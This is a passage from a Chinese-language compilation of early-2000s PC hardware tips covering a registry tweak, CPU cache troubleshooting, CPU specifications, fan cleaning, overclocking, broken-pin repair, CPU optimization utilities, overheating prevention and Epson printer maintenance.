    ①数值名称: LargePageMinimum
    ②数据类型: REG_DWORD 
    ③基数:16进制
    ④数据: 0xffffffff 
    4.退出注册表编辑器。
    5.重新启动电脑。
    修改完注册表后，读者会发现AGP存储器最大寻址在BIOS中会由256MB变为128MB，这个我们可以不理会，影响不大。
     注意:使用注册表编辑程序可能会导致你的机器出现问题甚至要重新安装你的系统。因此使用注册表编辑器时，请你在事前详细查看帮助文档，了解如何正确使用注册表编辑器，并做个备份。如果你的系统是Windows NT或Windows 2000，那么请你最好做一张应急盘。


解开CPU性能下降之谜

《一键清理系统垃圾》

解开CPU性能下降之谜

《中国电脑教育报》刘卫东

    单位的一台计算机，CPU为Intel P4 1.6GHz、主板是技嘉的i845G、显卡是微星的GeForce4 Ti 4200、内存128MB、硬盘60GB，只装有Windows 98、Office 2000、Photoshop、ACDSee等常用软件。

    平常运行一切正常，但有一天运行速度突然变得很慢，开机启动系统要近3分钟时间。由于这台计算机是上了互联网的，所以怀疑是有病毒了，找来杀毒软件一试，毫无发现。又想到可能是硬盘中有坏扇区了，就把整个硬盘重新分区，准备装Windows 2000企业版。在分区过程中，未发现有坏扇区，非常顺利。于是高高兴兴的开始安装系统了，刚开始还正常，没想到到复制文件时，运行速度又是“奇慢无比”了。想来可能是没有加载Smartdrv.exe 这个程序的缘故吧，退出后正确加载Smartdrv.exe程序，重新安装系统，故障依旧。是128MB的内存太小了吗？不会吧，记得以前在赛扬850MHz、128MB内存的计算机上安装运行Windows 2000 高级服务器版，速度也没这样慢呀！

    看来可能是硬盘有坏道了，分区也清不掉，没办法了只好使出“必杀技”了，将整个硬盘低格。花了几个小时低格结束，也没报什么错误，想来这下应该没问题了，再进行分区、格式化，为了保险起见，先装一个Windows 98吧。开始一切正常，进入安装界面后，天啊，老毛病又出现了。这下我真是不知所措了，脑子里开始胡思乱想，是主板损坏了吗？家里的Pentium 233MHz也没有这样慢，这台计算机前几天还是正常的，目前在DOS下运行也没问题，上面的推断马上又否定了。

    实在没辙了，是不是BIOS参数出了问题，但也不至于这样严重吧，没办法，只好进入BIOS设置程序，对参数逐项检查。突然，我发现其中的一项“CPU L1&&L2 Cache”被设为了“Disabled”，原来是CPU的一、二级缓存被关闭了，立即将它改了“Enabled”，退出来后重新安装Windows 2000企业版，一切正常。问题终于得到了解决。

    看来CPU的Cache对计算机的运行速度有很大影响。如果计算机出现了一些莫明其妙的问题，在排除病毒的基础上，多留意一下BIOS参数吧。同时遇到问题要善于动脑筋，排除故障时思路应宽一点，从简单到复杂逐一排除，不要用极端手段，以免增加不必要的麻烦。


葵花宝典——CPU技术参数集锦

《一键清理系统垃圾》

葵花宝典——CPU技术参数集锦

    CPU的英文全称是：Central Processing Unit，也就是中央处理器。从雏形发展壮大到今天，CPUde 制造技术是越来越先进，其集成的电子元件也越来越精密，上万个，甚至是上百万个微型的晶体管构成了CPU的内部结构。那么这上百万个晶体管是如何工作的呢？看上去似乎很深奥，其实只要稍加分析就会一目了然的，CPU的内部结构可分为控制单元，逻辑单元和存储单元三大部分。而CPU的工作原理就象一个工厂对产品的加工过程：进入工厂的原料（指令），经过物资分配部门（控制单元）的调度分配，被送往生产线（逻辑运算单元），生产出成品（处理后的数据）后，再存储在仓库（存储器）中，最后等着拿到市场上去卖（被应用程序使用）。
    CPU作为是整个PC系统的核心，也就成了各种档次的PC的代名词，如往日的386、486、586，到今日的Thunderbird、Pentium 4等等，CPU的性能大致上也就反映出了它所在PC的性能，因此它的性能指标十分重要。在这里我们向大家简单介绍一些CPU主要的性能指标：
    1、主频=倍频×外频　　经常听人家说：“这个计算机速度是多少?”其实这个泛指的频率是指CPU的主频，主频也就是CPU的时钟频率（CPU Clock Speed），简单地说也就是CPU运算时的工作频率。一般说来，主频越高，一个时钟周期里面完成的指令数也越多，当然CPU的速度也就越快了。不过由于各种各样的CPU它们的内部结构也不尽相同，所以并非所有的时钟频率相同的CPU的性能都一样。至于外频就是系统总线的工作频率；而倍频则是指CPU外频与主频相差的倍数。三者是有十分密切的关系的：主频=外频×倍频。
    2、内存总线速度　　英文全称是：Memory Bus Speed。CPU处理的数据是从哪里来的呢？学过一点计算机基本原理的朋友们都会清楚，是从主存储器那里来的，而主存储器指的就是我们平常所说的内存了。一般我们放在外存（磁盘或者各种存储介质）上面的资料都要通过内存，再进入CPU进行处理的。所以CPU与内存之间的通道的内存总线速度对整个系统性能就显得很重要了，由于内存和CPU之间的运行速度或多或少会有差异，因此便出现了二级缓存，来协调两者之间的差异，而内存总线速度就是指CPU与二级(L2)高速缓存和内存之间的通信速度。
    3、扩展总线速度　　英文全称是：Expansion Bus Speed。扩展总线指的就是指安装在微机系统上的局部总线如VESA或PCI总线，我们打开电脑的时候会看见一些插槽般的东西，这些就是扩展槽，而扩展总线就是CPU联系这些外部设备的桥梁。
    4、工作电压　　英文全称是：Supply Voltage。任何电器在工作的时候都需要电，自然也会有额定的电压，CPU当然也不例外了，工作电压指的也就是CPU正常工作所需的电压。早期CPU（286～486时代）的工作电压一般为5V，那是因为当时的制造工艺相对落后，以致于CPU的发热量太大，弄得寿命减短。随着CPU的制造工艺与主频的提高，近年来各种CPU的工作电压有逐步下降的趋势，以解决发热过高的问题。
    5、地址总线宽度　　地址总线宽度决定了CPU可以访问的物理地址空间，简单地说就是CPU到底能够使用多大容量的内存。16位的微机我们就不用说了，但是对于386以上的微机系统，地址线的宽度为32位，最多可以直接访问4096 MB（4GB）的物理空间。而今天能够用上1GB内存的人还没有多少个呢（当然服务器除外）。
    6、数据总线宽度　　数据总线负责整个系统的数据流量的大小，而数据总线宽度则决定了CPU与二级高速缓存、内存以及输入/输出设备之间一次数据传输的信息量。
    7、协处理器　　在486以前的CPU里面，是没有内置协处理器的。由于协处理器主要的功能就是负责浮点运算，因此386、286、8088等等微机CPU的浮点运算性能都相当落后，相信接触过386的朋友都知道主板上可以另外加一个外置协处理器，其目的就是为了增强浮点运算的功能。自从486以后，CPU一般都内置了协处理器，协处理器的功能也不再局限于增强浮点运算，含有内置协处理器的CPU，可以加快特定类型的数值计算，某些需要进行复杂计算的软件系统，如高版本的AUTO CAD就需要协处理器支持。
    8、超标量　　超标量是指在一个时钟周期内CPU可以执行一条以上的指令。这在486或者以前的CPU上是很难想象的，只有Pentium级以上CPU才具有这种超标量结构；486以下的CPU属于低标量结构，即在这类CPU内执行一条指令至少需要一个或一个以上的时钟周期。
    9、L1高速缓存　　L1高速缓存也就是我们经常说的一级高速缓存。在CPU里面内置了高速缓存可以提高CPU的运行效率，这也正是Pentium III比Celeron快的原因。内置的L1高速缓存的容量和结构对CPU的性能影响较大，容量越大，性能也相对会提高不少，所以这也正是一些公司力争加大L1级高速缓冲存储器容量的原因。不过高速缓冲存储器均由静态RAM组成，结构较复杂，在CPU管芯面积不能太大的情况下，L1级高速缓存的容量不可能做得太大。
    10、回写结构的高速缓存　　采用回写(Write Back)结构的高速缓存，它对读和写操作均有效，速度较快。而采用写通(Write-through)结构的高速缓存，仅对读操作有效.
    11、动态处理　　动态处理是应用在高能奔腾处理器中的新技术，创造性地把三项专为提高处理器对数据的操作效率而设计的技术融合在一起。这三项技术是多路分流预测、数据流量分析和猜测执行。动态处理并不是简单执行一串指令，而是通过操作数据来提高处理器的工作效率。
    （1）、多路分流预测：通过几个分支对程序流向进行预测，采用多路分流预测算法后，处理器便可参与指令流向的跳转。它预测下一条指令在内存中位置的精确度可以达到惊人的90%以上。这是因为处理器在取指令时,还会在程序中寻找未来要执行的指令。这个技术可加速向处理器传送任务。
    （2）、数据流量分析：抛开原程序的顺序，分析并重排指令，优化执行顺序：处理器读取经过解码的软件指令，判断该指令能否处理或是否需与其它指令一道处理。然后，处理器再决定如何优化执行顺序以便高效地处理和执行指令。
    （3）、猜测执行：通过提前判读并执行有可能需要的程序指令的方式提高执行速度：当处理器执行指令时(每次5条)，采用的是“猜测执行”的方法。这样可使处理器超级处理能力得到充分的发挥，从而提升软件性能。被处理的软件指令是建立在猜测分支基础之上，因此结果也就作为“预测结果”保留起来。一旦其最终状态能被确定，指令便可返回到其正常顺序并保持永久的机器状态。
    12、工艺材料　　近年来的芯片里面都是用铝线来做导体，但是随着芯片和芯片内电缆的缩小，铝线的使用已经到达了极限，所以芯片制造商就用比铝线更加好的铜来做芯片，也就是所谓的铜芯片。近日的技术已经能够克服铜和矽的不相容性，Pentium 4就是使用这种铜技术制造的，所以处理器的速度能够大大提升。
    硬件业界特别是芯片制造界有一条众所周知的摩尔法则，那就是说：放置在相同空间的晶体管数量和处理速度能力，在每到18～24个月就会翻一倍。这条理论可以说十分准确，因为从早期的286一直到今天的Pentium 4都是这样发展的。不过似乎现在的芯片发展比摩尔定律更加快了，可以说现在已经达到了“超速芯片”的地步。


如何清洗CPU风扇

《一键清理系统垃圾》

如何清洗CPU风扇

    忽然有那么一天，我打开电脑，就听见机箱里传出“轰隆隆”的巨响，没错！就是“轰隆隆”的声音，就和一架鼓风机的声音效果差不多……

   虽然说这个CPU风扇是当初配机时赠送的，因为当时贪便宜，所以也没有另外再给我的赛扬买一个新的风扇，现在看来这笔钱是省不下了。所以，既然要再买新的风扇，到不如先把旧的拆下来摆弄摆弄，就算坏了也不心疼，如果摆弄好的话还可以省下那点“小钱”，呵呵。

   首先，要用最基本的方法——加油！把我的赛扬从主板上拆下来，仔细看了一下，哇塞——上面积了不少灰尘，竟然还有老妈呢子大衣上的衣绒？哦，忘了告诉大家，在夏天的时候，为了给我超频的“菜羊”降温，我每天开机时都是用一架大台扇对着机箱猛吹，所以机箱里有它也并不为怪。接下来，先用吹气球和毛刷把灰尘清理干净，然后揭开风扇后面的不干胶，就是写着厂商的那张标签(不就是商标吗，废话)，小心不要撕破了，等一下还要再黏回去。(不过要是不小心撕破了也没有关系，到邻居小弟弟、小妹妹那边讨一点谢霆锋的贴纸贴上去就可以了，嘿嘿)。然后再弄一点缝纫机油（哇，好古老的东东了），因为缝纫机油比较细，润滑效果会好一点。如果你不在乎你的爱机的话，用点煤油之类的我也不反对。当然，如果你有什么航空专用的润滑油一类的，那效果会更爽。

   好了，下面可以试机了，怎么样，声音小了吧。什么，还是有一点？那不行，再试！看来这一次要给风扇开膛破肚了。再拆下风扇，清理转子和电刷！拿出我的尖嘴钳，先把风扇转子上的锁片拆下来，就是那种像一个圆环，中间有一个小缺口的圆环。这个可要小心，不然再弄丢了，小弟弟、小妹妹那边可讨不来了。将锁片拆下来后，就可以把风扇的转子拆下来了，哇——转子上的接触环和电刷上面积了一层黑黑的油垢，这怎么得了？我洗，我洗，我洗洗洗！拿出一瓶无水酒精，什么？没有无水酒精，那就用磁头清洁剂也行。用镊子缠一团脱脂棉，蘸一点无水酒精，先把那些油垢给小心地擦去，注意不要把电刷弄斜、弄歪、弄断，清理干净后，转子上的接触环是不是还是有点黑擦不掉？那些是转子和电刷在转动接触时被空气中的氧气氧化生成的氧化铜，下一步就是把它们杀死杀死杀死！拿出0号水砂纸，用一根牙签包住，仔细地将那些氧化铜打磨掉，是不是露出那金灿灿的铜环本色？现在可以啦？还不行，这刚刚打磨亮的铜环很快就会又被氧化掉，得给它上一层保护膜。拿出润滑脂(哇，这么多的道具呀？)，什么是润滑脂？机床上用的就是。不过可不能用那么粗颗粒的型号，我们的风扇也算是精密仪器嘛。实在没有就到钟表维修的小摊上去讨一点。然后用牙签挑一点润滑脂，均匀地涂在那些接触环上，电刷也涂一点，然后装机测试。

   经过这一系列的清洗过程，凭我主观的感觉来“评测”，这个风扇在没洗之前，每天晚上我在房间里上网打游戏时都会被老妈知道，结果自然是被赶上床睡觉；而自从给我的风扇洗了澡以后，我的机子噪声就小多了。机器噪声小，开机恁清静、睡觉恁香，上网、玩游戏恁爽，当夜猫恁安静，就连老妈也不来吵我了，哈哈。


如何使CPU超频免受外设的影响

《一键清理系统垃圾》

如何使CPU超频免受外设的影响

    相信不少朋友有过这样的经历：对CPU进行超频，在超较低的外频时（如75MHz、83MHz）失败，而在设为较高的外频时（如100MHz、133MHz）反而获得成功。究其原因是因为主板的标准分频基制造成的。我们知道，CPU的外频（系统总线频率）已经处于一个较高的水平。而声卡、硬盘等和AGP显卡的标准工作频率还是33MHz和66MHz，为保证系统能协调工作，当CPU外频设为66MHz时，PCI、IDE总线经过1/2分频，AGP总线与CPU外频一致；当CPU外频为100MHz时，PCI、IDE总线为1/3分频，AGP总线为2/3分频；而当CPU外频为133 MHz时，PCI、IDE总线为1/4分频，AGP总线为1/2分频，这就是我们常说的“支持标准外频”。

    当外频处于83MHz、112MHz、140MHz等频率时并不能保证PCI、IDE等总线处于标准频率，这就是所谓的“非标准外频”。

    很明显，当外频处于非标准频率时，外设就工作在超频状态，一旦外频超得稍高，外设就往往提前“阵亡”：声卡无声（声卡因素）、注册表损坏（硬盘因素）、显示刷新失败（显卡因素）等现象时有发生。种种迹象表明超频对外设的损害同样是永久性的，特别是硬盘、声卡长期超频提早“夭折”的机会相当大，我们总不能让硬盘（或声卡等）为了CPU超频而面临牺牲的危险吧？

    内存异步设置选项

    针对上述不利因素，一些厂商推出了采用新型时钟芯片制造的超频型主板，这些主板在提供逐MHz 调频的同时并可以在BIOS里进行锁定AGP、PCI、IDE标准频率设置；或者提供高达5x~6x的分频设置，使超频最大限度地不受声卡、硬盘等外设的影响。DIYer们攒机时如选择这类的主板就可以较好的解决后顾之忧。市面上常见的此类主板有磐英EP-4BDAE、技嘉GA- 8IGX、捷波J-845PE/GE等，它们在BIOS里进行超频设置的菜单基本上大同小异。
    以磐英EP-4BDAE主板为例，开机按键盘上的“Delete”键进入主板BIOS，在“Frequency/Voltage Control”菜单下有数项子菜单：“CPU FSB/Speed（CPU外频调节）”、“AGP/PCI Clock”（分频及锁定设置）、“Memory Frequency（内存异步设置）”、“CPU Vcore Voltage（CPU内核电压调节）”。其中在“AGP/PCI Clock”中有数项选择：“Auto”、“AGP-FSB*2/3，PCI-FSB/3”、“AGP-66MHz，PCI-33MHz（频率锁定）”；而“Memory Frequency”子菜单中也有“AUTO”、“DDR200”、“DDR266”等选项，这是内存异步设置选项，现在多数主板都具有这一功能。

    分别选中[AGP-66MHz、PCI-33MHz]和[DR266]后，就可以轻松地在“CPU FSB/Speed”菜单中逐MHz调高CPU的外频了。目前P4 1.6A/1.8AGHz处理器超频性能极佳，每每有能力超至150甚至160MHz外频以上，而这是在普通主板上不可能实现的。如超频后发觉CPU运行不稳定，可利用“CPU Vcore Voltage”菜单适当增加CPU核心电压，以增强超频后的稳定性。

    但是并非主板有了这些“特异功能”后就可以为所欲为地超频了，由于CPU主频和外设频率的差距越来越大，系统瓶颈也越明显。所以当外频达到某一水平时再向上提高并未达到相应的效果，反而会令系统的不稳定因素增加，例如CPU内核发热剧增、内存工作受影响等，这些也是CPU超频的隐患。总之，理性地超频才能在保证系统稳定的同时又能享受超频成功的乐趣！


系统频繁重启只因CPU损坏

《一键清理系统垃圾》

系统频繁重启只因CPU损坏

    一台几年前配置的兼容机：K6-2 200MHz CPU，采用VX-Pro+芯片组的主板，两根16MB 72线EDO内存，Windows 98操作系统。在出现蓝天白云画面后自动重启，安全模式同样无法进入，只能进入MS-DOS模式。

    笔者猜想由于内存条质量问题导致电脑重启的可能性较大，所以首先更换同型号内存条测试，故障依旧。再更换电源仍无法解决问题。排除到最后只剩下主板、CPU和显卡，试过显卡没有问题后，苦于找不到能安装K6-2 200MHz CPU的旧主板只能作罢。

    当时也怀疑过BIOS设置可能有误，试过恢复到缺省值，也未能解决问题。过了几天，再次摆弄电脑时，无意进入BIOS并将CPU Internal Cache一项设为Disable，保存退出后重启，系统竟然可以启动了！由此估计应当是CPU的缓存有问题，于是再将缓存设置为打开状态并启动电脑，果然系统又不能正常启动了。由于将缓存关闭后大幅度降低了CPU的性能，所以Windows 98在启动和运行程序时比以往慢了许多，最后换了一块CPU才算解决问题。


也谈CPU的断脚处理方法

《一键清理系统垃圾》

也谈CPU的断脚处理方法

    第45期的《电脑报》刊载了广西的iahe的《CPU断脚后的处理方法》，看后很受启发，但又觉得不是每个人使用电烙铁都得心应手的，再说在方法1中电烙铁对处于中间位置的断脚就不好下手，而用方法2万一把插座反面的焊点接错，造成引脚短路，恐怕就可能要想办法换个新的了。根据小弟这些年DIY的经验，我在处理CPU断脚时有一比较简便的方法，现在拿出来请各位DIYer参考一下。
    先找一根比大头针略细的电线内芯，最好是铜的，实在找不到就拿大头针上也没关系。用钳子钳取一段，截面要尽量的平滑，能用细砂纸打磨一下就更好了，或者把截面在水泥地上轻轻划几下也行，长度要比CPU的引脚稍长一点，但不要超过1毫米，然后把这个引脚代替品插入与断脚对应的CPU插座的插孔中，不要让它松动，再把CPU插入插座中，如果电线内芯插错了位置，不能与断脚相对应，那么CPU是插不进去的。待CPU顺利插入插座，电线内芯的另一端抵在CPU断脚留下的圆点上，一切就OK了！
    CPU并不需要经常插拔，所以这种方法对一般用户来说能够保持“长治久安”。而一旦需要更换CPU，可以先把CPU取下，然后用镊子把作为引脚替代品的电线内芯镊住，轻轻拔出，即可。这就是为什么要把这段内芯留得稍微长一点的原因，但为什么不要超过1毫米呢？我们都知道热胀冷缩，而铜的热胀冷缩更大，在电脑工作时，CPU温度会比平时提高很多，如果电线内芯留得太长，遇热时膨胀太多，也许会损坏CPU或主板，当然这种现象我还从来没看到过，但防范于未然也是应该的。
    最后要强调的是，在插上CPU后，替代引脚的电线内芯一定不能松动，以防与别的引脚接触引起短路。
    我用这种方法处理CPU的断脚问题，从5x86到赛扬Ⅱ都使用过，对Socket类CPU，无往而不“利”。


硬件优化漫谈之CPU篇

《一键清理系统垃圾》

硬件优化漫谈之CPU篇

    大家知道计算机是由软件和硬件配合进行工作的，在硬件规格确定的情况下往往可以可以通过特定的软件对硬件性能实施一定程度的优化。

CPU在电脑中的重要性不言而俞，优化CPU的工具也真不少。

一、可优化CPU和芯片组性能：Powertweak
Powertweak是Powertweak公司于1999年初推出的系统实用程序类共享软件,目前最高版本是1.03。Powertweak启动以后，会重新配置主板芯片组和CPU中的有关部件，使它们能够在工作中发挥得更好。Powertweak能够优化常见的各种主流CPU和芯片组，能够在各种主流操作系统(包括最新版本的win2000)上运行。
Powertweak优化的对象是CPU和芯片组内部不同组件之间数据传输的速度和相容性。目前Powertweak1.03的还存在一些兼容性的问题，比如无法与PentiumII+nVidia芯片配合，和PentiumIII配合也不太好。此外Powertweak优化的结果是暂时的，每次重新启动计算机，原来的优化设置即被清除，所以使用它不会永久地改变CPU和主板的硬件结构特性，可随时恢复到不优化状态。
Powertweak在安装的过程中能够自动探测用户当前使用的CPU和芯片组类型。安装结束后，通过"开始/程序"菜单中的相应指令打开设置窗口进行基本的设置，设置完成以后，重新启动系统，Powertweak即自动启动并采用已有的设置，使用户的CPU和主板芯片组被优化。

二、CPU降温兼优化：WaterfallPro
大家知道用软件可以对CPU进行降温，这方面的软件也有不少。随着软件降温技术的不断发展，有些降温软件比如Waterfall还具备一定的系统优化能力。新版的Waterfall支持几乎现在所能见到的所有的CPU类型（包括笔记本电脑使用的CPU），且与现在流行的大部分主板兼容，为用户提供了比较全面的选择。该软件具有如下特点： 1.最多可将CPU的温度降低30℃。
2.调整CPU的性能，让它能在最优状态下比较稳定地工作。
3.可以精确地测量与显示CPU的使用率，并能同时监控三个以上的周边设备，包含主板、硬盘等。
4.支持各种流行的主板，并且可以选择在系统发生问题前发出警报。
5.可节省笔记本电脑电池能量。即使在CPU全速运行时，也可以利用新的HTL(节流阀)技术降温，甚至还可以省下内部风扇的电源。
该软件安装过程非常简单，只要一路点Next就可以完成安装过程。软件安装完毕后，一开机便会自动执行，并且在桌面右下角的地方有一个图标，用鼠标直接在上面点一下，就能进入设定选单。选择"Option"选项里面的Setup选项，就可以针对你的主板以及CPU进行设定了。
设定时你首先选择你的CPU型号。之后是WaterfallPro2.1a对电压的设定，它不但提供了各种CPU的标准电压，还可以让你自行设定，给喜欢超频的朋友提供了很大的方便。
WaterfallPro2.1a对大多数常见主板提供了支持，在选择主板之后还可以对电源的各种输出电压，CPU以及电源风扇的电压进行设定。可以设定保护的上限和下限以及报警的声音。WaterfallPro2.1a还可以与Windows的DriveSpace、SystemInfo连结，即时显示各种系统资源与硬盘参数并对其进行优化， Waterfall也可以让你根据你的CPU选择是否使用HTL(节流阀)技术降温，记住设定完成后要将其最小化，它才开始优化你的电脑。

三、CPU超频软件
将CPU超频，是广大发烧友使用最多的"优化"手段。但以往的超频方法都是用主板跳线、BIOS 设置等"硬方法"。主板跳线超频很不方便，需要对照随机说明书，打开机箱，找到相应设置跳针,如果用户对计算机并不怎么熟悉，而随机说明书配置说明讲得又不是很清楚，这种硬跳线超频就非常危险。BIOS Jumpless免跳线超频需要用户熟悉计算机BIOS的确切含义，弄不好会把BIOS设置搞得一塌糊涂，如果超频不成功就必须清除CMOS ，又是一阵大动作。 不过有位天才设计出一套SoftFSB软件居然可以直接在Windows窗口下调节系统总线频率，达到超频目的。若超频成功，系统以后就将在此设定频率下工作，连重新开机都不需要：超频失败，重新开机，系统回到原来状态，丝毫不受影响。
所谓FSB，指的是Pentium Ⅱ的Front Side Bus，实际上就是系统频率，Intel只不过想表明Front Side Bus比以往传统的系统频率表现更好。SoftFSB通过软件改变时钟芯片（ClockGenerator Chip）部分寄存器（Register）数值，进而让该芯片根据这些数值产生相应的系统总线频率。目前许多Intel CPU的倍频被锁定，通过提高系统总线频率成了唯一的超频方法。SoftFSB 用法比较简单，如果你知道主板型号，那就通过选择主板型号来设定Get FSB项。也可以通过时钟芯片（Target Clock Generator）来设定Get FSB项，比较保险。

四、优化K6-2
AMD的K6-2曾是一款很受欢迎的CPU。直到现在还有不少朋友在使用，但大多数主板都不能打开K6－2所独有的WriteAllocation功能，所以我们要想办法打开这项功能，可以去找一个名为Setk6的小程序，只有一百多kB，使用这个程序后，能使AMD系列CPU K5、K6、K6－2的效能提高7％～8％。此外一些CPU降温软件如RAIN，也能对K6-2优化。
K6-2最重要的技术特点在于具备3DNow！指令集。要使此技术得以发挥，需要在软件中加入对该技术的支持。比如现在大多数新显卡的驱动程序都支持3DNow！技术；微软从DirectX6.0后也对其进行了优化，而新版的OpenGL和3DfxGlide等应用程序接口也对K6-2的3DNow！指令集进行了优化。


预防CPU烧毁的几点经验

《一键清理系统垃圾》

返回总目录 上一页 目录页

预防CPU烧毁的几点经验

    现在主流的CPU发热普遍巨大，今年夏天，我就眼看着朋友的一颗雷鸟CPU被烧毁，虽说最近天气凉快不少，可是预防CPU被烧毁永远是我们要注意的问题。

    首先选用质量上乘的散热风扇。如果是AMD处理器，最好选择通过AMD认证的专用风扇；如果是Intel处理器，则可以考虑买一个原装风扇。有些经过特殊设计的风扇也不错，比如有两个风扇的“两极风”，大大增加了保险系数，可以把风扇停转导致CPU烧毁的危险性大幅度降低。

    另外要注意对CPU温度的监控。新装机第一次启动机器时，马上应进入BIOS查看CPU的温度和风扇转速等参数。同时开启CPU温度过高报警功能、过高自动关机功能,或风扇停转自动关机等功能。现在很多主板也提供了软件支持在Windows下即时监控CPU温度，如QDI主板附带的StepEasy在提供超频功能的同时也提供了温度监控功能、华硕主板的ASUS PROBE在进行硬件监控的同时也能显示CPU温度，等等。

    注意搞好散热降温工作也是必需的。最好整理一下机箱内杂乱的连线，既能防止CPU风扇扇叶被意外卡住，也能更好保持空气的顺畅流通。建议加装机箱风扇，实际证明，在电源下方加装的风扇（立式机箱）由于在CPU的旁边，散热效果会比没有安装风扇提升很多。当然，再安装一个面板风扇进风效果会更好。不少降温软件号称对降低CPU温度有很大帮助，不过从实际应用来看，效果并不是很理想，不建议当作主要降温手段。

    强烈建议，大家不要再对高频率CPU超频了，原本发热量已经很大的高频率CPU一旦超频无异于火上浇油，不仅难以保证系统稳定运行，CPU被烧毁的可能性也将大大增加。此外，使用休眠时应设定CPU风扇不停转并把休眠时的CPU功耗设置为0%，让CPU在休眠时尽量减少发热，也是防止烧毁的必要方法。


cpu

《一键清理系统垃圾》

返回总目录

cpu

◎AMD Athlon64处理器实际运行频率换算公式
◎CPU的散热问题故障两例
◎CPU断脚后的处理方法
◎CPU风扇引发的系统启动异常
◎CPU风扇引起电脑工作不稳定一例
◎CPU资源占用100％解决方法
◎Windows XP中使用鼠标右键引起CPU 100%占用问题的解决
◎解决AGP显卡与AMD CPU冲突一法
◎解开CPU性能下降之谜
◎葵花宝典——CPU技术参数集锦
◎如何清洗CPU风扇
◎如何使CPU超频免受外设的影响
◎系统频繁重启只因CPU损坏
◎也谈CPU的断脚处理方法
◎硬件优化漫谈之CPU篇
◎预防CPU烧毁的几点经验

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


EPSON1500K打印机常见故障的维修

《一键清理系统垃圾》

返回总目录 目录页 下一页

EPSON1500K打印机常见故障的维修

    一、数据和缺纸指示灯闪烁
    1.打印机设置的进纸方式与你的实际进纸方式不一致，调整一致就可以了。
    2.装纸时，打印机不接受。此问题出在检纸开关上，由于长时间使用，使检纸器灵敏度下降。取下打印机后面的手动进纸槽，很容易看到检纸器的位置，它与主板相联接的是一组黄线，将其取下（用小镊子），用万用表检测，将会发现检纸开关不灵活或者断开的情况。将其用酒精冲洗干净或者更换，问题就能解决。
    二、数据和暂停指示灯闪烁，或者打印头左右撞头
    此问题主要是由于长时间使用，在打印头与导杆之间出现太多的杂物（主要是灰尘），造成阻力太大；开机时，打印头无法正确定位，使打印机出现死机现象。解决方法：
    第一种情况：关闭打印机，用棉花沾无水酒精将导杆清洗干净，再加上变压器油或者缝纫机油，用手左右拉动几次，问题解决。
    第二种情况：关闭打印机，过几秒钟后再开机，并且再次打印。
    三、所有的指示灯闪烁
    出现这种现象后，很多用户都以为是打印机出了大问题，或者认为这款打印机的质量有问题。其实恰恰相反，这正是它的优点，因为在EPSON 1500K的主板上有一块计数芯片是专门用来计算打印纸的数量的，当打印的纸张数量达到打印规定的数量时，打印机需要用户对废墨水盒进行清洗，然后对计数芯片进行清零;或者直接对计数芯片进行清零（建议不采用）。具体方法如下：
    1.将打印机关上，取出黑色墨水盒；
    2.将卷轴旋钮和切纸器取下；
    3.取下控制面板（面板前方有一个卡子）；
    4.取出左右三颗螺钉（控制面板），用一字形螺丝刀将打印机下面的卡子扳开；再将其盖子取下，用镊子将废墨水盒里的泡抹取出，用水将其冲洗干净并干燥；
    5.以上工作完成后，将打印机还原、开机。此时你还会看到故障现象与原来一样，因为你还没有将计数器清零。请同时按下切换－换行／换－进纸／退纸－微调整右边按钮，然后开机。当听到一声清脆的声音后，说明操作成功。
    四、打印出的字扭曲
    直接用随打印机提供的软件进行校准；在该软件不能校好的情况下，只能用打印机内自带的软件进行校准，具体方法如下：
    1.按下暂停键并开机；
    2.装入A4纸打印，这时打印机会给你打印出两张目前打印机的状态样张（第一张为说明方法，第二张为校准图案Pattern 1）。两页纸打印完后，打印机状态为电源灯亮。观察校准图案是否处于对准位置NO.1～NO.25，当发现某一NO.x的竖线没对准时，则从这一NO.x开始校准，并且按切换键直到指示灯指明相应的图案号码。按暂停键打印，此时打印将从你所选NO.x开始校准，但打印机仍是从第一根竖线开始打印。此时打印机会连续打印7页，注意：正在打印时，不要关打印机。当你确定了最后的选择后（页号是7），关打印机电源。然后联机打印，若字还是扭曲，重复以上步骤，直到正确为止。
    最后，我还要提醒各位用户，在关打印机之前，请确认暂停灯亮，因为这是打印机认为任务结束的标志，否则认为非正常关机，下次开机时，打印机会再次清洗打印头，这样就会浪费很多墨水。


EPSON 750打印机喷头的清洗

《一键清理系统垃圾》

EPSON 750打印机喷头的清洗

    首先，我要告诉广大EPSON用户，千万别以为它有多娇贵，那都是惯出来的。打印机喷头堵的主要原因不是用了兼容墨水，而是不经常打印，墨水干了堵塞；或墨盒每次都没有回原位，没有经过橡皮和羊毛毡擦拭。
    清洗之前的准备：
    一次性注射器1只，纯净水1瓶，小碗1只，十字起、一字起各1把，小刀1把，好的餐巾纸两包，吹风机1只。
    由于没有数码相机，我的叙述可能不是非常精确，所以你一定要记住每个零件原来的方向和位置后，拆下，然后，试着装上再正式拆下，这是最重要的！
    清洗方法：
    1.关掉打印机电源，拔掉电源线和打印电缆，把打印机放到空桌子，或长沙发上；
    2.翻下出纸器，取走托纸架，掀开上盖，把右边的纸张厚度调节杆从0位推到＋位；
    3.打印机外壳由四颗螺钉固定，托纸架两边各有一个，前面的一只在墨盒边上（把墨盒向里推一点好拆），另一只在左边对称位置。拆下这四颗螺钉，把外壳向后上方托起就下来了；
    4.把皮带轮拉钩的弹簧向里按到位，捏住皮带轮将皮带和皮带轮一起摘下；
    5.把调节杆下的弹簧向里按下，取出弹簧，这里许多零件都是利用倒钩结构和塑料的弹性来固定的，用一字起小心把倒钩从固定的孔里按出，转动调节杆，取下；
    6.用小刀轻轻拨起墨盒导杆右端白色定位连杆上的定位卡（它一头抵在导杆的凹槽内），把它和金属弹簧垫片一起取下；
    7.拆下导杆两端固定卡上的螺钉，注意固定卡上有一段弧上的齿是定位的。它是固定在从里往外数第四个齿上。向两侧掰开固定卡，向下转动固定卡对准打印机上的槽口，即可取下两个固定卡和墨盒导杆；
    8.现在，打开墨盒的两个上盖，分别取出黑色和彩色墨盒，墨盒上盖是卡在墨盒上的，向两边掰开盒盖的两只脚，向上取出墨盒盖；
    9.拆下墨盒右下方一块金属片上的螺钉，取下这片喷头固定金属片；
    10.再看墨盒后面，现在喷头架与墨盒只靠线缆下方两只塑料倒钩固定，轻轻撬开它们即可，电源插头很小，用小刀撬起来，再把线缆拔下；
    11.把纯净温热水倒在小碗内，把喷头浸在碗里，注意千万不要弄湿电路板，一手用注射器吸热水对准喷头的进水嘴用力注射冲洗。最好一碗水冲一种颜色喷头；
    12.观察每一个出水口都通了，再用空注射器用空气冲每一个进水口。最后用吹风机吹干喷头架上的水，别太热！
